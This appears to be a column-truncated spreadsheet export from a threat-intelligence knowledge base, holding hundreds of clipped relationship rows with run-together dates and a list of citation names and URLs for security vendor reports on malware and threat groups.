relationsh 17 January09 October 2020
relationsh 12 October27 July 2021
relationsh 21 March 15 April 2024
relationsh 20 October22 October 2020
relationsh 18 Februar26 March 2020
relationsh 30 Decemb18 October 2021
relationsh 30 Decemb15 February 2024
relationsh 25 March 16 March 2021
relationsh 30 January01 April 2022
relationsh 21 June 2019 August 2024
relationsh 24 March 31 March 2020
relationsh 04 Februar01 September 2020
relationsh 21 June 2015 October 2021
relationsh 24 January16 October 2021
relationsh 12 Februar23 June 2021
relationsh 24 January25 March 2020
relationsh 16 March 20 April 2021
relationsh 20 May 20 20 May 2020
relationsh 20 Februar15 October 2021
relationsh 16 March 10 February 2022
relationsh 17 July 20 20 July 2021
relationsh 24 January25 March 2020
relationsh 13 June 2001 April 2022
relationsh 16 Februar17 February 2022
relationsh 28 January29 March 2020
relationsh 11 July 20 11 July 2022
relationsh 15 June 2015 June 2022
relationsh 29 July 20 29 July 2022
relationsh 28 January29 March 2020
relationsh 02 March 25 March 2022
relationsh 25 June 2023 February 2022
relationsh 21 June 2011 December 2020
relationsh 02 March 25 March 2022
relationsh 27 March 27 March 2020
relationsh 16 October16 October 2024
relationsh 29 March 29 March 2024
relationsh 24 June 2003 August 2020
relationsh 31 January17 February 2022
relationsh 28 January29 March 2020
relationsh 11 July 20 11 July 2022
relationsh 29 July 20 29 July 2022
relationsh 28 January29 March 2020
relationsh 23 January11 March 2022
relationsh 25 March 24 March 2022
relationsh 04 Februar12 April 2021
relationsh 02 March 25 March 2022
relationsh 05 October09 July 2020
relationsh 21 Februar19 October 2021
relationsh 21 Februar29 March 2020
relationsh 21 Februar18 October 2021
relationsh 16 March 02 April 2021
relationsh 22 March 22 March 2023
relationsh 04 Februar19 October 2022
relationsh 26 March 09 March 2022
relationsh 21 Februar15 October 2021
relationsh 19 March 13 January 2021
relationsh 25 June 2023 February 2022
relationsh 20 April 2020 April 2022
relationsh 04 Februar13 September 2021
relationsh 10 January01 April 2022
relationsh 25 June 2009 June 2021
relationsh 10 Februar20 April 2021
relationsh 22 April 2018 October 2022
relationsh 13 March 29 March 2020
relationsh 10 January24 March 2020
relationsh 13 March 16 September 2020
relationsh 13 March 17 September 2020
relationsh 13 March 17 September 2020
relationsh 24 January08 February 2022
relationsh 04 Februar29 March 2023
relationsh 21 Februar20 June 2020
relationsh 24 March 27 April 2021
relationsh 10 Februar31 March 2020
relationsh 02 March 25 March 2022
relationsh 05 Februar09 February 2021
relationsh 24 June 2001 April 2022
relationsh 25 Februar23 March 2020
relationsh 01 March 01 March 2024
relationsh 10 March 30 August 2021
relationsh 20 June 2002 March 2021
relationsh 07 October07 October 2024
relationsh 15 January24 March 2020
relationsh 02 March 25 March 2022
relationsh 30 January14 March 2022
relationsh 10 March 22 March 2022
relationsh 17 January09 October 2020
relationsh 12 October27 July 2021
relationsh 21 March 11 April 2024
relationsh 21 June 2017 October 2021
relationsh 24 January25 March 2020
relationsh 24 January20 August 2021
relationsh 04 Februar16 March 2021
relationsh 04 Februar01 September 2020
relationsh 10 Septem10 November 2020
relationsh 13 March 26 April 2021
relationsh 26 March 09 March 2022
relationsh 24 January25 March 2020
relationsh 24 March 03 August 2020
relationsh 25 June 2030 August 2021
relationsh 15 June 2015 June 2022
relationsh 23 April 2026 April 2021
relationsh 29 March 19 October 2021
relationsh 29 March 29 March 2020
relationsh 29 March 18 October 2021
relationsh 26 March 09 March 2022
relationsh 29 March 15 October 2021
relationsh 24 March 24 March 2020
relationsh 11 April 2011 April 2023
relationsh 25 June 2013 August 2020
relationsh 31 March 11 April 2023
relationsh 05 Februar09 February 2021
relationsh 31 March 01 April 2022
relationsh 20 June 2002 March 2021
relationsh 13 March 14 October 2021
relationsh 27 March 16 August 2021
relationsh 31 March 31 March 2022
relationsh 24 January25 March 2020
relationsh 30 January01 April 2022
relationsh 14 March 26 March 2020
relationsh 09 Septem08 October 2024
relationsh 23 June 2027 March 2022
relationsh 23 January11 March 2022
relationsh 01 Septem01 September 2023
relationsh 08 October08 October 2024
relationsh 14 March 26 March 2020
relationsh 10 March 11 March 2022
relationsh 24 June 2008 March 2022
relationsh 12 March 27 March 2020
relationsh 09 March 15 October 2021
relationsh 09 March 28 March 2020
relationsh 09 March 28 March 2020
relationsh 27 Februar27 February 2023
relationsh 23 June 2016 August 2021
relationsh 11 March 11 March 2020
relationsh 14 March 26 March 2020
relationsh 02 March 27 September 2021
relationsh 02 March 18 October 2021
relationsh 02 March 04 January 2022
relationsh 02 March 18 October 2020
relationsh 08 October01 April 2022
relationsh 08 October08 October 2024
relationsh 01 March 01 March 2024
relationsh 16 October16 October 2024
relationsh 21 June 2005 January 2022
relationsh 23 June 2007 March 2022
relationsh 18 July 20 26 March 2020
relationsh 16 March 20 April 2021
relationsh 14 March 16 September 2020
relationsh 16 March 26 March 2020
relationsh 14 March 30 August 2021
relationsh 15 Februar15 February 2024
relationsh 28 March 28 March 2024
relationsh 01 July 20 01 July 2024
relationsh 06 June 2001 October 2024
relationsh 19 October19 April 2022
relationsh 01 July 20 01 July 2024
relationsh 24 May 20 30 September 2023
relationsh 09 March 22 February 2022
relationsh 17 Decemb12 October 2021
relationsh 30 Septem30 September 2023
relationsh 19 March 13 January 2021
relationsh 21 Februar25 August 2021
relationsh 09 March 11 March 2022
relationsh 25 Septem25 September 2024
relationsh 20 October17 February 2022
relationsh 19 July 20 16 August 2021
relationsh 07 Novemb16 August 2021
relationsh 14 April 2021 June 2021
relationsh 04 March 31 May 2024
relationsh 03 March 31 May 2024
relationsh 24 January08 February 2022
relationsh 19 October22 October 2020
relationsh 25 June 2031 August 2021
relationsh 04 March 31 May 2024
relationsh 03 March 31 May 2024
relationsh 04 March 31 May 2024
relationsh 03 March 31 May 2024
relationsh 14 October26 December 2023
relationsh 27 March 16 August 2021
relationsh 04 March 04 March 2024
relationsh 10 October14 December 2023
relationsh 17 Decemb20 September 2021
relationsh 30 January12 October 2021
relationsh 24 June 2025 March 2020
relationsh 24 June 2029 March 2020
relationsh 24 June 2022 April 2021
relationsh 24 June 2024 February 2022
relationsh 08 August 23 August 2023
relationsh 01 March 01 March 2024
relationsh 24 January24 March 2020
relationsh 24 January04 May 2020
relationsh 03 April 2027 April 2021
relationsh 25 June 2006 January 2022
relationsh 20 April 2020 April 2022
relationsh 11 March 07 July 2020
relationsh 11 March 07 July 2020
relationsh 26 Februar26 February 2024
relationsh 08 October08 October 2024
relationsh 13 March 26 April 2021
relationsh 19 October19 April 2022
relationsh 24 June 2008 March 2022
relationsh 28 March 28 March 2024
relationsh 24 June 2020 July 2021
relationsh 07 October07 October 2024
relationsh 24 June 2025 March 2020
relationsh 24 June 2029 March 2020
relationsh 24 June 2022 April 2021
relationsh 24 June 2024 February 2022
relationsh 20 June 2025 March 2022
relationsh 27 March 17 June 2020
relationsh 26 March 09 March 2022
relationsh 20 October17 February 2022
relationsh 18 July 20 16 August 2021
relationsh 07 Novemb16 August 2021
relationsh 07 Novemb16 August 2021
relationsh 07 Novemb15 October 2021
relationsh 30 January31 August 2021
relationsh 16 Februar16 February 2022
relationsh 14 April 2008 October 2024
relationsh 13 Novemb21 October 2020
relationsh 19 October22 October 2020
relationsh 21 June 2011 December 2020
relationsh 08 October08 October 2024
relationsh 21 June 2008 March 2022
relationsh 19 Decemb19 May 2020
relationsh 27 March 16 March 2021
relationsh 27 March 31 March 2020
relationsh 24 January04 May 2020
relationsh 30 January06 January 2022
relationsh 13 March 26 March 2020
relationsh 26 March 09 March 2022
relationsh 30 January31 August 2021
relationsh 12 March 16 September 2020
relationsh 02 October02 October 2023
relationsh 16 July 20 24 April 2021
relationsh 28 March 28 March 2024
relationsh 18 October18 October 2022
relationsh 27 May 20 10 March 2023
relationsh 27 May 20 18 October 2022
relationsh 14 July 20 14 July 2023
relationsh 27 Novemb11 March 2022
relationsh 16 July 20 13 April 2021
relationsh 18 July 20 18 October 2021
relationsh 29 March 09 March 2022
relationsh 24 June 2030 August 2021
relationsh 11 August 16 March 2021
relationsh 10 August 01 April 2022
relationsh 20 August 11 March 2022
relationsh 11 October14 October 2024
relationsh 06 October07 October 2021
relationsh 11 May 20 16 October 2021
relationsh 02 January02 January 2024
relationsh 14 Februar08 June 2021
relationsh 01 April 2015 April 2023
relationsh 01 April 2015 April 2023
relationsh 29 March 01 April 2022
relationsh 15 Februar15 February 2024
relationsh 31 March 15 April 2023
relationsh 11 October30 September 2024
relationsh 18 Februar17 October 2021
relationsh 09 June 2030 September 2024
relationsh 25 March 24 March 2022
relationsh 29 March 06 April 2021
relationsh 08 October08 October 2024
relationsh 03 Decemb24 March 2022
relationsh 01 July 20 01 July 2024
relationsh 25 Septem13 October 2024
relationsh 05 October09 July 2020
relationsh 17 July 20 08 October 2021
relationsh 16 June 2030 September 2024
relationsh 29 March 15 April 2023
relationsh 02 June 2002 June 2023
relationsh 28 Septem28 September 2023
relationsh 21 Februar19 October 2021
relationsh 24 June 2007 July 2020
relationsh 12 October08 March 2022
relationsh 30 Septem30 September 2023
relationsh 21 Februar29 March 2020
relationsh 21 Februar18 October 2021
relationsh 07 October07 October 2024
relationsh 17 July 20 11 January 2021
relationsh 13 March 26 March 2020
relationsh 22 March 22 March 2023
relationsh 18 August 30 September 2023
relationsh 17 Decemb21 March 2023
relationsh 28 Decemb09 February 2021
relationsh 26 March 09 March 2022
relationsh 21 Februar15 October 2021
relationsh 19 March 13 January 2021
relationsh 21 March 24 September 2024
relationsh 18 April 2020 April 2022
relationsh 17 January07 October 2021
relationsh 10 March 15 October 2021
relationsh 25 Septem13 October 2024
relationsh 07 October07 October 2024
relationsh 10 July 20 30 September 2023
relationsh 18 Februar31 March 2020
relationsh 05 August 05 August 2024
relationsh 17 October17 October 2024
relationsh 17 October17 October 2022
relationsh 05 Septem05 September 2023
relationsh 08 June 2030 September 2024
relationsh 25 Septem25 September 2024
relationsh 31 May 20 19 July 2022
relationshi20 October26 July 2021
relationsh 17 March 17 March 2022
relationsh 30 January31 August 2021
relationsh 30 January31 August 2021
relationsh 08 October08 October 2024
relationsh 05 October09 October 2020
relationsh 25 Februar23 March 2020
relationsh 12 Februar28 March 2022
relationsh 25 Februar23 March 2020
relationsh 18 July 20 13 October 2021
relationsh 17 Decemb20 September 2021
relationsh 12 Februar15 October 2021
relationsh 01 April 2001 April 2022
relationsh 27 Novemb30 December 2020
relationsh 19 July 20 20 April 2021
relationsh 22 July 20 01 April 2022
relationsh 27 May 20 27 May 2022
relationsh 18 July 20 02 March 2021
relationsh 12 March 16 September 2020
relationsh 24 March 08 June 2021
relationsh 24 January07 October 2024
relationsh 18 July 20 11 December 2020
relationsh 07 October07 October 2024
relationsh 13 Decemb04 January 2022
relationsh 07 October07 October 2024
relationsh 08 October15 April 2023
relationsh 07 October07 October 2024
relationsh 10 March 22 March 2022
relationsh 17 January20 March 2023
relationsh 12 October27 July 2021
relationsh 10 July 20 21 September 2023
relationsh 18 Februar26 March 2020
relationsh 28 Novemb28 November 2022
relationsh 11 October04 March 2024
relationsh 25 Septem25 October 2024
relationsh 21 June 2018 October 2022
relationsh 30 January16 October 2024
relationsh 17 March 17 March 2022
relationsh 22 July 20 26 July 2021
relationsh 17 July 20 15 October 2021
relationsh 24 January16 October 2021
relationsh 17 January16 September 2020
relationsh 24 January21 April 2020
relationsh 10 Septem10 November 2020
relationsh 15 October28 July 2021
relationsh 16 October17 March 2022
relationsh 13 June 2027 April 2021
relationsh 21 June 2018 October 2021
relationsh 21 Februar24 March 2020
relationsh 17 March 11 April 2023
relationsh 17 May 20 01 April 2022
relationsh 11 May 20 16 October 2021
relationsh 24 March 08 June 2021
relationsh 04 Februar12 April 2021
relationsh 08 October08 October 2024
relationsh 01 July 20 01 July 2024
relationsh 20 June 2008 October 2021
relationsh 10 May 20 19 October 2021
relationsh 07 October07 October 2024
relationsh 10 August 14 October 2021
relationsh 17 Septem17 September 2024
relationsh 18 August 11 April 2024
relationsh 18 Februar08 March 2022
relationsh 08 August 23 August 2023
relationsh 21 Februar24 March 2020
relationsh 20 Februar15 October 2021
relationsh 11 March 05 January 2022
relationsh 30 March 26 August 2021
relationsh 11 March 31 March 2020
relationsh 28 August 28 August 2023
relationsh 30 August 30 August 2024
relationsh 21 June 2001 April 2022
relationsh 01 April 2015 April 2022
relationsh 21 Februar08 March 2022
relationsh 17 July 20 20 July 2021
relationsh 28 August 28 August 2023
relationsh 08 October08 October 2024
relationsh 02 March 27 September 2021
relationsh 19 October15 April 2021
relationsh 24 January31 March 2022
relationsh 20 Februar25 March 2020
relationsh 24 March 08 June 2021
relationsh 21 June 2011 December 2020
relationsh 02 March 18 October 2021
relationsh 19 October15 April 2021
relationsh 02 March 07 October 2024
relationsh 19 October04 August 2023
relationsh 19 October15 April 2021
relationsh 08 Septem08 September 2023
relationsh 08 Septem08 September 2023
relationsh 02 March 18 October 2020
relationsh 04 October01 April 2022
relationsh 14 October02 January 2024
relationsh 25 June 2012 January 2022
relationsh 25 March 16 March 2021
relationsh 21 June 2005 January 2022
relationsh 17 May 20 17 March 2022
relationsh 11 March 14 July 2020
relationsh 11 March 14 July 2020
relationsh 17 July 20 20 July 2021
relationsh 24 June 2024 February 2022
relationsh 21 June 2008 March 2022
reference citation url
20 macOS Phil Stoke https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
360 Machekate. (2020https://blog.360totalsecurity.com/en/apt-c-43-steals-venezuelan-military-secrets-to-provide-intelligence
AADInternaDr. Nestorihttps://o365blog.com/aadinternals/
AADInternaDr. Nestorihttps://o365blog.com/post/on-prem_admin/
AADInternaDr. Nestorihttps://o365blog.com/aadinternals
AADInternaDr. Nestorihttps://aadinternals.com/post/azurevms/
ACSC EmailAustralian https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/s
ADSecurityMetcalf, S. https://adsecurity.org/?p=556
ADSecuritySean Metcahttps://adsecurity.org/?p=2288
ADSecuritySean Metcahttps://adsecurity.org/?p=483
ADSecurityMetcalf, S. https://adsecurity.org/?p=1729
ADSecurityMetcalf, S https://adsecurity.org/?p=3299
ANSSI NobeANSSI. (20 https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-011.pdf
ANSSI RY ANSSI. (20 https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-006.pdf
ANSSI San ANSSI. (2 https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-005.pdf
APT15 InteRosenberg,https://web.archive.org/web/20180615122133/https://www.intezer.com/miragefox-apt15-resurfaces-w
APT3 AdverKorban, C, https://attack.mitre.org/docs/APT3_Adversary_Emulation_Plan.pdf
ASEC EmotASEC. (201https://global.ahnlab.com/global/upload/download/asecreport/ASEC%20REPORT_vol.88_ENG.pdf
ASERT DonSchwarz, Dhttps://www.arbornetworks.com/blog/asert/donot-team-leverages-new-modular-malware-framework-
ASERT InnaASERT Team. https://asert.arbornetworks.com/innaput-actors-utilize-remote-access-trojan-since-2016-presumably-ta
ATT FelismJulia Kisie https://cybersecurity.att.com/blogs/security-essentials/the-felismus-rat-powerful-threat-mysterious-pur
ATT QakBotMorrow, D.https://cybersecurity.att.com/blogs/labs-research/the-rise-of-qakbot
ATT SidewiHegel, T. ( https://cdn-cybersecurity.att.com/docs/global-perspective-of-the-sidewinder-apt.pdf
ATT TeamTAT&T Alienhttps://cybersecurity.att.com/blogs/labs-research/teamtnt-with-new-campaign-aka-chimaera
AWS - IAMMoncur, Rohttps://aws.amazon.com/blogs/security/newly-updated-features-in-the-aws-iam-console-help-you-adhe
AWS DB VPAWS. (n.d.)https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/USER_VPC.WorkingWithRDSInstanceinaVP
AWS Data PAWS. (n.d. https://aws.amazon.com/identity/data-perimeters-on-aws/
AWS Manage AWS. (n.d. https://docs.aws.amazon.com/organizations/latest/userguide/orgs_best-practices_mgmt-acct.html
AWS RE:InfBen Fletchehttps://reinforce.awsevents.com/content/dam/reinforce/2024/slides/TDR432_New-tactics-and-techniq
Accenture Accenture https://www.accenture.com/t20180127T003755Z_w_/us-en/_acnmedia/PDF-46/Accenture-Security-Dr
Accenture Accenture http://web.archive.org/web/20220810112638/https:/www.accenture.com/t20180423T055005Z_w_/se
S
Accenture Accenture.https://www.accenture.com/us-en/blogs/cyber-defense/turla-belugasturgeon-compromises-governmen
Accenture Accenture.https://www.accenture.com/us-en/blogs/cyber-defense/iran-based-lyceum-campaigns
Accenture Accenture https://www.accenture.com/us-en/blogs/cyber-defense/mudcarps-focus-on-submarine-technologies
Accenture Accenture https://www.accenture.com/t20181129T203820Z__w__/us-en/_acnmedia/PDF-90/Accenture-snakema
AcidRain J Juan Andrehttps://www.sentinelone.com/labs/acidrain-a-modem-wiper-rains-down-on-europe/
AdSecurityMetcalf, S https://adsecurity.org/?p=2293
AdSecurityMetcalf, S https://adsecurity.org/?p=1729
AdSecurityMetcalf, S https://adsecurity.org/?p=1640
AdsecurityMetcalf, S https://adsecurity.org/?page_id=1821
AhnLab And AhnLab. (20https://web.archive.org/web/20230213154832/http://download.ahnlab.com/global/brochure/%5BAnal
Airbus DerPerigaud, https://web.archive.org/web/20180607084223/http://blog.airbuscybersecurity.com/post/2015/11/New
Akamai DGA Liu, H. and https://medium.com/@yvyuz/a-death-match-of-domain-generation-algorithms-a5b5dbdc1c6e
AlienVault Blasco, J. https://www.alienvault.com/open-threat-exchange/blog/another-sykipot-sample-likely-targeting-us-fed
Alienvault Blasco, J. https://www.alienvault.com/open-threat-exchange/blog/sykipot-variant-hijacks-dod-and-windows-sma
Alintanahi Alintanahi http://blog.trendmicro.com/trendlabs-security-intelligence/kunming-attack-leads-to-gh0st-rat-variant/
Alperovitc Alperovitchhttps://web.archive.org/web/20200424075623/https:/www.crowdstrike.com/blog/deep-thought-chines
Amazon AW Amazon. (n.https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_temp.html
Amazon AW MacCarthaighttps://aws.amazon.com/blogs/security/defense-in-depth-open-firewalls-reverse-proxies-ssrf-vulnerabi
Amazon S3Amazon. (2https://aws.amazon.com/premiumsupport/knowledge-center/secure-s3-resources/
Amnesty InAmnesty Int https://www.amnestyusa.org/wp-content/uploads/2021/02/Click-and-Bait_Vietnamese-Human-Rights-D
Amplia WCAmplia Secu https://web.archive.org/web/20240904163410/https://www.ampliasecurity.com/research/wcefaq.htm
Anomali EvShelmire, https://www.anomali.com/blog/evasive-maneuvers-the-wekby-group-attempts-to-evade-analysis-via-cu
Anomali Li Anomali Lahttps://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat
Anomali MAnomali Thr https://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-pr
Anomali PiMoore, S. https://www.anomali.com/blog/anomali-suspects-that-china-backed-apt-pirate-panda-may-be-seeking-
Anomali R Anomali Lab https://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang
Anomali StaMele, G. e https://www.anomali.com/blog/probable-iranian-cyber-actors-static-kitten-conducting-cyberespionage-
Anomali TeIntel_Acquihttps://forum.anomali.com/t/credential-harvesting-and-malicious-file-delivery-using-microsoft-office-te
Antiy CERTAntiy CERT.https://www.programmersought.com/article/62493896999/
Apple App Apple Inc. https://support.apple.com/guide/security/app-security-overview-sec35dd877d0/1/web/1
Apple DeveApple Inc. https://developer.apple.com/documentation/security/hardened_runtime
Apple TN24Apple. (201https://developer.apple.com/library/archive/technotes/tn2459/_index.html
Apple UnifSarah Edwar https://sarah-edwards-xzkc.squarespace.com/blog/2020/4/30/analysis-of-apple-unified-logs-quarantine
Applicatio Brandon Dahttps://redcanary.com/blog/mac-application-bundles/
Aqua KinsinSinger, G. https://blog.aquasec.com/threat-alert-kinsing-malware-container-vulnerability
Aqua TeamKol, Roi. https://blog.aquasec.com/container-security-tnt-container-attack
Aquino RA Aquino, M.http://blog.trendmicro.com/trendlabs-security-intelligence/rarstone-found-in-targeted-attacks/
Arbor MusiSabo, S. (2 https://www.arbornetworks.com/blog/asert/musical-chairs-playing-tetris/
Arctic WolfSteven Camphttps://arcticwolf.com/resources/blog/conti-and-akira-chained-together/
Arghire LazIonut Arghihttps://www.securityweek.com/new-lazyscripter-hacking-group-targets-airlines/
Ars Techn Goodin, D. https://arstechnica.com/information-technology/2017/03/hack-that-escapes-vm-by-exploiting-edge-bro
Arxiv AvadYuste, J. P https://arxiv.org/pdf/2102.04796.pdf
AsyncRAT Nyan-x-Cathttps://github.com/NYAN-x-CAT/AsyncRAT-C-Sharp/blob/master/README.md
Avast CCle Avast Threahttps://blog.avast.com/new-investigations-in-ccleaner-incident-point-to-a-possible-third-stage-that-had
Avertium BAvertium. https://www.avertium.com/resources/threat-reports/in-depth-look-at-black-basta-ransomware
Avira MustHamzeloofar https://www.avira.com/en/blog/new-wave-of-plugx-targets-hong-kong
Awake SecuGahlot, A. https://awakesecurity.com/blog/threat-hunting-for-avaddon-ransomware/
Azure AD FeDr. Nestorihttps://o365blog.com/post/federation-vulnerability/
Azure AD Dr. Nestorihttps://o365blog.com/post/just-looking
Azure SubscMicrosoft https://learn.microsoft.com/en-us/azure/cost-management-billing/manage/manage-azure-subscription-
BH Manul Galperin, Ehttps://www.blackhat.com/docs/us-16/materials/us-16-Quintin-When-Governments-Attack-State-Spon
BaumgartnBaumgartne https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07205555/TheNaikonA
Beechey 2 Beechey, J http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propagan
Berkley Se Berkeley Sehttps://security.berkeley.edu/node/94
BiZone Liz BI.ZONE Cybhttps://bi-zone.medium.com/from-pentest-to-apt-attack-cybercriminal-group-fin7-disguises-its-malware
Binary Def Binary Def https://www.binarydefense.com/resources/blog/emotet-evolves-with-new-wi-fi-spreader/
Bishop FoxKervella, R https://labs.bishopfox.com/tech-blog/sliver
BitDefend Vrabie, V., https://www.bitdefender.com/files/News/CaseStudies/study/394/Bitdefender-PR-Whitepaper-BADHAT
BitDefendeRusu, B. ( https://www.bitdefender.com/blog/labs/iranian-chafer-apt-targeted-air-transportation-and-governmen
BitdefendeBitdefendehttps://download.bitdefender.com/resources/media/materials/white-papers/en/Bitdefender_In-depth_
BitdefenderArsene, L. https://labs.bitdefender.com/2020/04/oil-gas-spearphishing-campaigns-drop-agent-tesla-spyware-in-ad
BitdefendeMartin Zuge https://businessinsights.bitdefender.com/deep-dive-into-a-fin8-attack-a-forensic-investigation
Bitdefend Vrabie, V. https://www.bitdefender.com/files/News/CaseStudies/study/379/Bitdefender-Whitepaper-Chinese-APT
BitdefendeBotezatu, Bhttps://www.bitdefender.com/blog/labs/luminousmoth-plugx-file-exfiltration-and-persistence-revisited
BitdefendeVrabie, V. https://www.bitdefender.com/files/News/CaseStudies/study/396/Bitdefender-PR-Whitepaper-NAIKON-
BitdefendeBudaca, E.,https://www.bitdefender.com/files/News/CaseStudies/study/401/Bitdefender-PR-Whitepaper-FIN8-cre
BitdefendeTudorica, Rhttps://www.bitdefender.com/files/News/CaseStudies/study/353/Bitdefender-Whitepaper-StrongPity-A
BitdefenderLiviu Arsenhttps://www.bitdefender.com/blog/labs/trickbot-is-dead-long-live-trickbot/
BitdefendeTudorica, https://www.bitdefender.com/files/News/CaseStudies/study/316/Bitdefender-Whitepaper-TrickBot-en-
BitdefendeRadu Tudori https://www.bitdefender.com/files/News/CaseStudies/study/399/Bitdefender-PR-Whitepaper-Trickbot-
Bitsight La Batista, J. https://www.bitsight.com/blog/latrodectus-are-you-coming-back
Bizeul 201 Bizeul, D., https://airbus-cyber-security.com/the-eye-of-the-tiger/
Black Hills Bullock, B. https://www.blackhillsinfosec.com/attacking-exchange-with-mailsniper/
BlackBerryKasuya, M.https://blogs.blackberry.com/en/2020/01/threat-spotlight-amadey-bot
BlackBerryThe BlackBhttps://www.blackberry.com/us/en/pdfviewer?file=/content/dam/blackberry-com/asset/enterprise/pdf
BlackBerryBallmer, D.https://blogs.blackberry.com/en/2022/05/black-basta-rebrand-of-conti-or-something-new
BlackBerryThe BlackBhttps://blogs.blackberry.com/en/2020/11/the-costaricto-campaign-cyber-espionage-outsourced
Blasco 201Blasco, J. http://www.alienvault.com/open-threat-exchange/blog/new-sykipot-developments
Bleeping CAbrams, L. https://www.bleepingcomputer.com/news/security/ryuk-ransomware-uses-wake-on-lan-to-encrypt-offl
Bleeping Toulas, B. https://www.bleepingcomputer.com/news/security/inc-ransom-threatens-to-leak-3tb-of-nhs-scotland-s
Bleeping CAbrams, L. https://www.bleepingcomputer.com/news/security/new-latrodectus-malware-attacks-use-microsoft-clo
Bleeping CI. Ilascu. https://www.bleepingcomputer.com/news/security/op-sharpshooter-connected-to-north-koreas-lazaru
